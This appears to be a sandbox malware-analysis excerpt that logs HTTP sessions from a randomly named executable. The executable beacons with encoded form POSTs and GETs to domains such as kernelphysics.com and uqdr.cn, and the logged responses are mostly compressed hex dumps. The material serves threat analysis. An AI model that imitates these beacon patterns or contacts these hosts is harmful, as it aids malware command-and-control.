                                  Data Raw: 34 68 3d 35 55 4a 6a 76 2f 44 41 50 65 6b 33 55 55 4e 4b 44 36 6c 4f 41 63 72 6d 36 38 54 76 37 68 51 42 6d 6e 65 55 56 4b 51 6f 42 56 6e 6b 4c 73 39 31 59 6d 47 48 30 73 4b 76 61 5a 68 78 71 2f 62 48 57 35 33 62 64 73 37 55 6c 36 64 52 67 59 65 75 32 74 5a 46 63 34 58 4b 4d 68 43 30 58 31 66 4e 4b 38 64 46 77 67 59 57 6b 34 77 35 37 67 71 47 6a 59 37 38 75 78 65 54 7a 65 45 58 55 75 4d 77 77 66 6c 6f 39 53 5a 39 53 4f 65 30 6d 45 74 31 62 73 5a 2f 46 39 52 5a 4e 45 63 74 62 6c 51 51 4b 32 75 38 75 46 38 47 48 41 71 63 58 43 79 37 34 35 30 68 72 55 4d 64 50 5a 4a 41 48 57 41 74 6f 6a 78 78 44 6f 4e 30 77 75 62 54 51 77 65 4a 48 77 34 46 31 57 30 73 79 6a 4b 45 78 4c 51 55 73 72 6f 78 68 77 4c 70 63 4d 6d 70 6d 2f 72 66 46 6e 61 75 6d 41 39 62 66 54 5a 45 78 65 6f 35 4a 4b 48 62 5a 44 38 47 37 43 52 75 39 68 44 52 72 55 4a 78 35 6f 58 6c 33 63 46 39 5a 4b 30 76 47 33 78 52 5a 71 4d 66 58 66 33 54 75 73 31 61 49 76 71 65 58 33 4f 53 4d 49 33 78 6f 63 39 4f 31 6b 64 43 7a 65 5a 71 67 70 67 75 78 53 74 [TRUNCATED]
                                  Data Ascii: 4h=5UJjv/DAPek3UUNKD6lOAcrm68Tv7hQBmneUVKQoBVnkLs91YmGH0sKvaZhxq/bHW53bds7Ul6dRgYeu2tZFc4XKMhC0X1fNK8dFwgYWk4w57gqGjY78uxeTzeEXUuMwwflo9SZ9SOe0mEt1bsZ/F9RZNEctblQQK2u8uF8GHAqcXCy7450hrUMdPZJAHWAtojxxDoN0wubTQweJHw4F1W0syjKExLQUsroxhwLpcMmpm/rfFnaumA9bfTZExeo5JKHbZD8G7CRu9hDRrUJx5oXl3cF9ZK0vG3xRZqMfXf3Tus1aIvqeX3OSMI3xoc9O1kdCzeZqgpguxSt2uJ63i+CMzWghwAtf+teKbh/HNFm6VeNhgirCR7wmmsqL0pCTNfV3R6Cxl9gStk8fNNuo7IBDeKv3sM1gxjBkbbU3jaVKnHkfqtubW4RjDZ/yuqFvbkR5nbQFHbWVu/opA+gdmW4zQSOYVPj2UjviU8HRz4LLRIHSUxdRhgPTtsA6E31WnrJ+4oi+b0D14A/WpZo1N1BQpmFqZUK+HeKakBgIfGz0H4m4GbKmQjqXL3Q9ob00d1m07He2svhQMHCadHN1SWWkzSePNMkzUlCnbudP5R/Vs8Y+p99JnoWBbIy+4OVwo+ujZVb/5sT4fnqJd/bH9wHpXacvlf3iJIqgmkIWtfq4QWwRrtQsbGd+1Jc8O78NbkB+c/u1iNDqozsNQhikCA2TTdiYBYrRGKt4QrNLjKdjb1DeRChceC6T2KCY87aBsQyBYUHmqbrfrpym+4SgPgbCwZyZdKum7xrdksGWjFbi66WhCnqPownrP8gf0iQv0lEDxg3eDeb04/x2jzcJQfg3yfvbqzq2pedGwfNRVt/yieEUtnC8Cayf1sVqu1zi+MHvcbXRhoh12igTOfz9bnVXFpA4N9LcdZkLqm1rMHWRxVs8kxhibitee9AjRgfJhcXOrMHG+PPewdSHUgeapqelx9ab8uXIKREWHQXtr0iGG4dNg [TRUNCATED]
                                  May 27, 2024 12:36:33.929122925 CEST645INHTTP/1.1 200 OK
                                  Date: Mon, 27 May 2024 10:36:33 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Powered-By: Nginx
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XBrLkTeeg6qFXua2dsx%2FGlJISdSImLL%2BPur5cSMbQ5t%2FZt4N3X%2FlED6FaPPjM43i9DiEg1AC1oEj%2B8ZTFQU3pb1Zh644lLEo6ElOgfUJGu%2F7RR0EASp%2BhEAxY91W5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 88a55d56ee697c90-EWR
                                  Content-Encoding: gzip
                                  alt-svc: h3=":443"; ma=86400
                                  Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                  Data Ascii: f
                                  May 27, 2024 12:36:33.930200100 CEST501INData Raw: 31 64 61 0d 0a 9c 52 bf 8f d3 30 14 de f3 57 58 5e 92 48 d4 06 b1 d0 36 e9 70 88 f5 c4 70 1b 62 70 9c d7 c4 c5 b1 83 fd d2 b4 45 27 b1 20 c1 04 03 03 48 27 81 10 82 85 01 24 84 10 0c fc 35 ad d4 89 7f 01 a5 29 77 3d 04 0b 96 6c e9 fd f8 be f7 bd
                                  Data Ascii: 1daR0WX^H6ppbpE' H'$5)w=lJEOiX8ou6 )A 'M*O/>o[}9yqgGOARFSzeJ)yaLd)LnP/15Q p$I


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  40192.168.2.749751188.114.96.3806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:36:36.012903929 CEST482OUTGET /yfa0/?4h=0WhDsKDlEsw2U2hGDN8VHtGa3OHmwnAep36jQbkxMA/yUt9OY1uk5sHeApFDjZn3CMzAWurlvftixp+c+vBUGrqZNxyLTULtMs5Dxygy6ogz213YpKfivi2Kz6VhB8QL1f0m+iF6WOns&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.uqdr.cn
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:36:36.617582083 CEST1236INHTTP/1.1 200 OK
                                  Date: Mon, 27 May 2024 10:36:36 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Powered-By: Nginx
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JFeDM6TgFXoepX1YMGPnwVIhFH0Yd%2BuG2A%2BwjOaLEvdPivlj1HyeHxm40o6D4ps2n0uRTi%2B2jHgcTUL1RyxQ58Tz%2BTxbM6CyXKO%2FqvK%2BjCcyBv3w6PAPMdKHpSIOZw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 88a55d67aed45e68-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  Data Raw: 33 31 64 0d 0a ef bb bf 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 e6 b1 9f e9 98 b4 e9 94 a6 e5 a4 a7 e6 9c ba e6 a2 b0 e5 88 b6 e9 80 a0 e6 9c 89 e9 99 90 e5 85 ac e5 8f b8 27 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0a 20 20 20 20 69 66 [TRUNCATED]
                                  Data Ascii: 31d<html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><scrip
                                  May 27, 2024 12:36:36.617594004 CEST172INData Raw: 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20
                                  Data Ascii: t language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html>0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  41192.168.2.74975245.64.187.212806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:36:43.328705072 CEST763OUTPOST /w912/ HTTP/1.1
                                  Host: www.kernelphysics.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.kernelphysics.com
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.kernelphysics.com/w912/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 69 62 69 7a 33 78 51 4d 58 7a 4a 66 32 4c 34 7a 67 4e 36 2f 47 31 41 30 34 78 7a 46 73 6f 59 43 54 6e 71 75 46 77 2f 4b 56 66 74 78 39 7a 4c 52 4c 47 59 59 73 52 49 6a 76 6e 4f 31 63 6a 70 67 36 2f 44 4d 47 6b 2b 52 59 51 77 35 52 72 47 32 68 55 4f 66 49 65 68 48 30 71 2f 56 74 75 30 57 71 6a 66 74 59 68 56 47 79 4d 48 2f 66 6a 39 72 79 45 49 36 78 68 4a 36 6e 63 46 38 6f 53 59 63 63 59 77 52 71 4c 68 44 65 79 7a 35 35 30 55 6a 6f 56 73 55 71 48 50 37 66 35 61 47 67 65 6c 64 75 74 6b 4f 37 2b 75 54 57 52 64 71 6c 38 7a 41 78 75 49 45 59 79 31 6d 2f 4b 31 41 6f 54 78 74 47 53 6c 74 54 77 2b 64 45 75 68 41 45 79 44 48 2b 67 3d 3d
                                  Data Ascii: 4h=ibiz3xQMXzJf2L4zgN6/G1A04xzFsoYCTnquFw/KVftx9zLRLGYYsRIjvnO1cjpg6/DMGk+RYQw5RrG2hUOfIehH0q/Vtu0WqjftYhVGyMH/fj9ryEI6xhJ6ncF8oSYccYwRqLhDeyz550UjoVsUqHP7f5aGgeldutkO7+uTWRdql8zAxuIEYy1m/K1AoTxtGSltTw+dEuhAEyDH+g==
                                  May 27, 2024 12:36:44.435375929 CEST1236INHTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:36:44 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                  Link: <https://kernelphysics.com/wp-json/>; rel="https://api.w.org/"
                                  Server: Nginx_Rc-Cr
                                  Content-Encoding: br
                                  Data Raw: 32 32 31 64 0d 0a 15 74 9b 8c 44 58 93 7a 00 34 42 87 cf 79 ff ef 4f fd fe bf ed 9f af 1d 65 c5 86 1c 49 48 14 17 1c 98 92 c9 b9 37 33 3d e5 b5 38 2b 4b 80 b0 49 30 62 21 11 3b 97 e1 95 d2 cf 9d d7 eb b4 eb f3 f7 e7 bf 7c 53 75 09 28 86 ce e3 ca ae 3c 2e ca 90 62 95 73 49 be b0 ab f9 7b ff 6e e6 0e 07 78 70 80 c2 01 20 3d a0 22 c0 30 cc 6f c3 df 7f 09 14 00 52 12 08 2a 80 54 0c b1 73 d5 84 dc b9 2c cf 19 56 c5 d6 ae b4 0c 73 d9 d3 f9 6d ea dd 95 27 84 10 42 08 2d 6c 6e c3 d9 31 b1 fe 3b 85 84 01 0d 12 99 3c 86 fb fe fa 57 18 db 70 41 89 c8 de 85 28 01 26 2e d9 7b bc 2b 72 b8 bc 80 39 dc c7 40 45 20 da 9a 11 92 15 b9 bd 06 34 56 c8 39 60 93 10 98 37 05 2a 45 1e 35 8a e1 7c 33 0b e6 07 35 fb 50 cd 46 ac 95 91 88 42 25 18 b9 bc b0 ef 59 a7 c3 38 89 10 f0 0e ba 15 87 95 c0 9c 9d b3 92 42 4b 36 10 21 26 b7 cb 84 09 e8 b3 28 8f ac 36 f5 8a 37 af c6 2e af 1c ce 63 0e 16 d5 8a fc ae cb 2a 4f b2 a9 64 29 43 90 a5 26 ed 36 65 53 a7 a7 ce 20 9c e1 e1 e0 6c 55 98 e6 f8 b4 00 c8 71 d9 ee fe 67 68 56 a1 ea cc 03 [TRUNCATED]
                                  Data Ascii: 221dtDXz4ByOeIH73=8+KI0b!;|Su(<.bsI{nxp ="0oR*Ts,Vsm'B-ln1;<WpA(&.{+r9@E 4V9`7*E5|35PFB%Y8BK6!&(67.c*Od)C&6eS lUqghV8j9$L<~cLHwXY'C\2r Wiz|~x#vKiMZ5E/%M"6b<$,8%h(J>*J4z\@eR*P3kTCMSRfl^_@nB-qQBX;6zjZncq-):$oRXWKghjT#+KKX:3uwSw H?`uT?.>oTm:*&*/n:t5#KQ;b4")UzY6zG}:GuBl):#)1T[MaZfauMf7RJ@ftKoge-.TumT#Vji.X7Z/m-iw}BO]3fXTTBxg`cI,oX30}2^
                                  May 27, 2024 12:36:44.435410023 CEST1236INData Raw: 4b d2 95 34 4d ef b9 fe 40 18 01 de d0 73 3a 2f 2f 1b 37 91 85 d7 9e d5 a2 c0 18 69 0d a3 62 a8 2a 21 a4 ff 91 12 1b 8d e7 d7 01 19 45 51 73 67 ee 7b 9b c8 fb b4 a4 02 ac 6b 19 bb 4b 85 96 48 39 a9 a2 30 32 80 7a a5 68 d9 66 33 2f 5d b6 59 9e 7b
                                  Data Ascii: K4M@s://7ib*!EQsg{kKH902zhf3/]Y{6,_.cu'bU9Y.g7Gyln:A2NinJ>2};b#{Q,*sx9GOP,=kRw~=CGPy6<:Ue
                                  May 27, 2024 12:36:44.435425997 CEST1236INData Raw: 13 93 4e 8f 2e 10 4a 55 08 31 8c 56 43 18 42 69 bf 08 37 21 7d 11 15 49 86 36 ca 6b 62 23 be 25 42 38 16 49 32 4b bd 28 68 69 5d ba 99 fc af 80 6d bc 16 a5 24 96 7c 08 fb 6d 4c 67 99 98 e2 5c 4b 6f ca 48 23 b3 1f 43 9a bb d2 95 1b 95 ed a6 a8 54
                                  Data Ascii: N.JU1VCBi7!}I6kb#%B8I2K(hi]m$|mLg\KoH#CT#<kxL$2t$K vk|(5<SV3=mS9O.ym@4^ +aM0uN<Ag5mj2bef{
                                  May 27, 2024 12:36:44.435435057 CEST672INData Raw: 4f 5c bc 39 31 7d 2c 48 a2 c5 71 f6 e1 8e c3 f7 cb 5c 17 7d ec ba fc 92 95 19 49 94 6d 32 88 91 97 63 22 a3 61 8b 43 af 2c 3e 5f d7 24 d1 87 c2 5b cf 32 b2 ff 72 ac 6b 19 71 78 db 51 2f 57 30 bf b4 f8 a1 fa fb 04 4e 7e 5e 7e a8 3d 20 c3 be 14 57
                                  Data Ascii: O\91},Hq\}Im2c"aC,>_$[2rkqxQ/W0N~^~= W/o\p=>^T9Dm*w0XtaR|8p/xhc,:Y{4#7/6P?;x~X ,AYgP\I+VFa+g!3ERnG'@qEj#'d(M
                                  May 27, 2024 12:36:44.435446978 CEST1236INData Raw: f1 42 b3 0d 41 4e b7 17 f6 27 a4 4e 07 c6 b0 de 0b bf b7 5a d8 63 60 76 07 ec dc ce ab 28 b1 30 60 19 2e e5 ce e6 93 ab 04 a4 05 08 59 bf a0 41 cd be e5 aa 34 90 69 8e b2 76 0c cf ac eb b0 c0 49 1b 55 d7 dc cf d1 36 91 24 f6 24 e2 b9 3b cf 55 42
                                  Data Ascii: BAN'NZc`v(0`.YA4ivIU6$$;UB#T>WF6]7cMhBTD;;Hw54nRC32ezIaYGeM<2HE/K1bO|9wqVJRMhR%}<X\m=f{w\
                                  May 27, 2024 12:36:44.435458899 CEST1236INData Raw: d1 1f d4 72 27 79 a9 61 60 3e 4a 04 0b 97 fe 1d 47 81 b7 a8 94 e1 4b 37 18 81 9c e4 90 14 ba d2 f3 84 b0 01 6c 29 fc 5d 37 be 79 cb 6e 0d 8f 7b cc cd 81 eb 6e ab 04 a8 4a c9 9d 44 8b 0e 50 c3 e2 42 19 70 4a 3b 0a ea 22 48 04 f2 12 6c 79 f3 c3 cb
                                  Data Ascii: r'ya`>JGK7l)]7yn{nJDPBpJ;"Hly7aZ.}]7y^d _N`X)owS2Egha%sC]t*!AEzc3-d23k59Y3e,]Xsvk`tUyNf[
                                  May 27, 2024 12:36:44.435466051 CEST1236INData Raw: 6e be e6 e7 b1 ff 3f ec ff a1 b9 59 b6 56 1b a9 89 0f 15 9b d5 a1 15 4b b6 e9 2e 5b 15 69 96 39 bf ef 61 91 0f 2f 92 87 15 0d 6d 65 72 48 91 5d f2 e6 81 9c b4 8f 65 cb 6b 6c 39 08 56 43 4e 8c e5 df de 85 58 0e bb 2d 41 f8 41 27 4c 72 8b 5b 62 23
                                  Data Ascii: n?YVK.[i9a/merH]ekl9VCNX-AA'Lr[b#rY^rfv_R+NcKKh;6{kFn``Od`Z>I]6`VOfM[-/EoRJ@9:[aVXm3a$b=v
                                  May 27, 2024 12:36:44.435478926 CEST1037INData Raw: 95 43 61 40 14 e7 40 6a 2b 21 ae 27 86 7e ea 9f 8d 83 30 0d ac af 77 f5 99 aa f5 11 dc ac 85 81 a2 89 90 8a 6a d4 e8 79 d1 47 0d 24 72 3e 7c 43 23 71 50 9b d3 47 ba f5 00 3e 5c 39 1f 48 b9 f5 bb ab e3 4b 03 a5 52 4f 1a 62 79 e0 38 12 46 61 2b f4
                                  Data Ascii: Ca@@j+!'~0wjyG$r>|C#qPG>\9HKROby8Fa+F~POK"4/0(C3TB3?HI0rf:%E$f5>mn.EZ*p5?!\$Z6HXt[iF#!lz@^


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  42192.168.2.74975345.64.187.212806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:36:45.867072105 CEST783OUTPOST /w912/ HTTP/1.1
                                  Host: www.kernelphysics.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.kernelphysics.com
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.kernelphysics.com/w912/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 69 62 69 7a 33 78 51 4d 58 7a 4a 66 30 72 49 7a 74 4f 69 2f 42 56 41 33 6b 42 7a 46 6c 49 59 47 54 6e 6d 75 46 77 57 56 56 74 4a 78 7a 79 37 52 4b 48 59 59 74 52 49 6a 32 58 4f 77 59 6a 70 37 36 2f 50 45 47 6c 43 52 59 51 30 35 52 71 32 32 68 44 61 63 4a 4f 68 46 2f 4b 2f 58 79 2b 30 57 71 6a 66 74 59 68 41 74 79 4e 6a 2f 66 7a 74 72 67 31 49 6c 38 42 4a 35 6d 63 46 38 2b 53 59 59 63 59 78 32 71 50 70 70 65 33 33 35 35 78 6f 6a 6f 47 30 62 7a 58 50 39 52 5a 62 4c 6e 4f 67 6e 68 76 59 33 33 49 76 4b 50 68 41 4a 67 4b 75 69 72 4d 45 6f 47 6a 4e 64 37 49 52 32 2f 31 73 59 45 54 68 31 65 53 4b 38 62 5a 45 71 4a 67 69 44 6f 52 62 4d 2f 59 70 69 56 47 2f 4a 2f 44 73 32 43 68 76 64 57 48 38 3d
                                  Data Ascii: 4h=ibiz3xQMXzJf0rIztOi/BVA3kBzFlIYGTnmuFwWVVtJxzy7RKHYYtRIj2XOwYjp76/PEGlCRYQ05Rq22hDacJOhF/K/Xy+0WqjftYhAtyNj/fztrg1Il8BJ5mcF8+SYYcYx2qPppe3355xojoG0bzXP9RZbLnOgnhvY33IvKPhAJgKuirMEoGjNd7IR2/1sYETh1eSK8bZEqJgiDoRbM/YpiVG/J/Ds2ChvdWH8=
                                  May 27, 2024 12:36:46.976382971 CEST1236INHTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:36:46 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                  Link: <https://kernelphysics.com/wp-json/>; rel="https://api.w.org/"
                                  Server: Nginx_Rc-Cr
                                  Content-Encoding: br
                                  Data Raw: 32 32 31 64 0d 0a 15 74 9b 8c 44 58 93 7a 00 34 42 87 cf 79 ff ef 4f fd fe bf ed 9f af 1d 65 c5 86 1c 49 48 14 17 1c 98 92 c9 b9 37 33 3d e5 b5 38 2b 4b 80 b0 49 30 62 21 11 3b 97 e1 95 d2 cf 9d d7 eb b4 eb f3 f7 e7 bf 7c 53 75 09 28 86 ce e3 ca ae 3c 2e ca 90 62 95 73 49 be b0 ab f9 7b ff 6e e6 0e 07 78 70 80 c2 01 20 3d a0 22 c0 30 cc 6f c3 df 7f 09 14 00 52 12 08 2a 80 54 0c b1 73 d5 84 dc b9 2c cf 19 56 c5 d6 ae b4 0c 73 d9 d3 f9 6d ea dd 95 27 84 10 42 08 2d 6c 6e c3 d9 31 b1 fe 3b 85 84 01 0d 12 99 3c 86 fb fe fa 57 18 db 70 41 89 c8 de 85 28 01 26 2e d9 7b bc 2b 72 b8 bc 80 39 dc c7 40 45 20 da 9a 11 92 15 b9 bd 06 34 56 c8 39 60 93 10 98 37 05 2a 45 1e 35 8a e1 7c 33 0b e6 07 35 fb 50 cd 46 ac 95 91 88 42 25 18 b9 bc b0 ef 59 a7 c3 38 89 10 f0 0e ba 15 87 95 c0 9c 9d b3 92 42 4b 36 10 21 26 b7 cb 84 09 e8 b3 28 8f ac 36 f5 8a 37 af c6 2e af 1c ce 63 0e 16 d5 8a fc ae cb 2a 4f b2 a9 64 29 43 90 a5 26 ed 36 65 53 a7 a7 ce 20 9c e1 e1 e0 6c 55 98 e6 f8 b4 00 c8 71 d9 ee fe 67 68 56 a1 ea cc 03 [TRUNCATED]
                                  Data Ascii: 221dtDXz4ByOeIH73=8+KI0b!;|Su(<.bsI{nxp ="0oR*Ts,Vsm'B-ln1;<WpA(&.{+r9@E 4V9`7*E5|35PFB%Y8BK6!&(67.c*Od)C&6eS lUqghV8j9$L<~cLHwXY'C\2r Wiz|~x#vKiMZ5E/%M"6b<$,8%h(J>*J4z\@eR*P3kTCMSRfl^_@nB-qQBX;6zjZncq-):$oRXWKghjT#+KKX:3uwSw H?`uT?.>oTm:*&*/n:t5#KQ;b4")UzY6zG}:GuBl):#)1T[MaZfauMf7RJ@ftKoge-.TumT#Vji.X7Z/m-iw}BO]3fXTTBxg`cI,oX30}2^
                                  May 27, 2024 12:36:46.976399899 CEST1236INData Raw: 4b d2 95 34 4d ef b9 fe 40 18 01 de d0 73 3a 2f 2f 1b 37 91 85 d7 9e d5 a2 c0 18 69 0d a3 62 a8 2a 21 a4 ff 91 12 1b 8d e7 d7 01 19 45 51 73 67 ee 7b 9b c8 fb b4 a4 02 ac 6b 19 bb 4b 85 96 48 39 a9 a2 30 32 80 7a a5 68 d9 66 33 2f 5d b6 59 9e 7b
                                  Data Ascii: K4M@s://7ib*!EQsg{kKH902zhf3/]Y{6,_.cu'bU9Y.g7Gyln:A2NinJ>2};b#{Q,*sx9GOP,=kRw~=CGPy6<:Ue
                                  May 27, 2024 12:36:46.976458073 CEST1236INData Raw: 13 93 4e 8f 2e 10 4a 55 08 31 8c 56 43 18 42 69 bf 08 37 21 7d 11 15 49 86 36 ca 6b 62 23 be 25 42 38 16 49 32 4b bd 28 68 69 5d ba 99 fc af 80 6d bc 16 a5 24 96 7c 08 fb 6d 4c 67 99 98 e2 5c 4b 6f ca 48 23 b3 1f 43 9a bb d2 95 1b 95 ed a6 a8 54
                                  Data Ascii: N.JU1VCBi7!}I6kb#%B8I2K(hi]m$|mLg\KoH#CT#<kxL$2t$K vk|(5<SV3=mS9O.ym@4^ +aM0uN<Ag5mj2bef{
                                  May 27, 2024 12:36:46.976470947 CEST1236INData Raw: 4f 5c bc 39 31 7d 2c 48 a2 c5 71 f6 e1 8e c3 f7 cb 5c 17 7d ec ba fc 92 95 19 49 94 6d 32 88 91 97 63 22 a3 61 8b 43 af 2c 3e 5f d7 24 d1 87 c2 5b cf 32 b2 ff 72 ac 6b 19 71 78 db 51 2f 57 30 bf b4 f8 a1 fa fb 04 4e 7e 5e 7e a8 3d 20 c3 be 14 57
                                  Data Ascii: O\91},Hq\}Im2c"aC,>_$[2rkqxQ/W0N~^~= W/o\p=>^T9Dm*w0XtaR|8p/xhc,:Y{4#7/6P?;x~X ,AYgP\I+VFa+g!3ERnG'@qEj#'d(M
                                  May 27, 2024 12:36:46.976483107 CEST656INData Raw: 10 9c 3a 50 f1 dc 29 02 bd 37 9a 0d dd 43 b1 0c 04 73 9c 53 98 63 4a d3 5c c2 9b 91 ac de 7d 7c 23 31 93 d0 86 4e 1d 5a 6d c0 c0 a8 ee 2a 77 a2 29 c5 33 60 a5 59 35 ae 00 9d da 6a 9c 54 72 4b e7 ba c2 23 d9 80 6e a4 7f 30 d9 69 56 46 34 5d 30 17
                                  Data Ascii: :P)7CsScJ\}|#1NZm*w)3`Y5jTrK#n0iVF4]0tNpjy+w"%p. Hqp(8E_1*'ef=Ad&"PT!'2%R5C_yrJ@efJ=qb*iT{t9SS;R
                                  May 27, 2024 12:36:46.976600885 CEST1236INData Raw: 8b 46 3a 1a 70 4c c8 24 03 a2 c2 37 03 c3 42 47 d1 1f d4 72 27 79 a9 61 60 3e 4a 04 0b 97 fe 1d 47 81 b7 a8 94 e1 4b 37 18 81 9c e4 90 14 ba d2 f3 84 b0 01 6c 29 fc 5d 37 be 79 cb 6e 0d 8f 7b cc cd 81 eb 6e ab 04 a8 4a c9 9d 44 8b 0e 50 c3 e2 42
                                  Data Ascii: F:pL$7BGr'ya`>JGK7l)]7yn{nJDPBpJ;"Hly7aZ.}]7y^d _N`X)owS2Egha%sC]t*!AEzc3-d23k59Y3e,]Xsvk
                                  May 27, 2024 12:36:46.976614952 CEST224INData Raw: d2 3f 65 4e a8 20 e6 3f 43 9b 7f 65 30 f3 17 7c 6e be e6 e7 b1 ff 3f ec ff a1 b9 59 b6 56 1b a9 89 0f 15 9b d5 a1 15 4b b6 e9 2e 5b 15 69 96 39 bf ef 61 91 0f 2f 92 87 15 0d 6d 65 72 48 91 5d f2 e6 81 9c b4 8f 65 cb 6b 6c 39 08 56 43 4e 8c e5 df
                                  Data Ascii: ?eN ?Ce0|n?YVK.[i9a/merH]ekl9VCNX-AA'Lr[b#rY^rfv_R+NcKKh;6{kFn``Od`Z>I]6`VOfM[-/EoRJ@
                                  May 27, 2024 12:36:46.976628065 CEST1236INData Raw: ec 39 de 3a 84 12 8d 5b 94 61 1d 56 bb 58 02 1a 6d bb 80 99 33 61 13 bb 24 62 ed 02 c7 3d d1 d4 76 0c ad 37 c1 92 07 5a 35 c1 3e 36 ee fa 3e dc 59 3c e2 35 12 c8 c8 b6 c1 c0 0a 4e e1 ac 97 23 a1 dd c5 06 2b 8b 4e 70 a8 d0 64 81 b6 69 28 fe cd ae
                                  Data Ascii: 9:[aVXm3a$b=v7Z5>6>Y<5N#+Npdi(JopLV^M9H(SA1FH!rJwn><q kRs&!l^['H,r9lK=C0$rTxAylcmJ0f#BkhASt/Sp :!+GYIU4
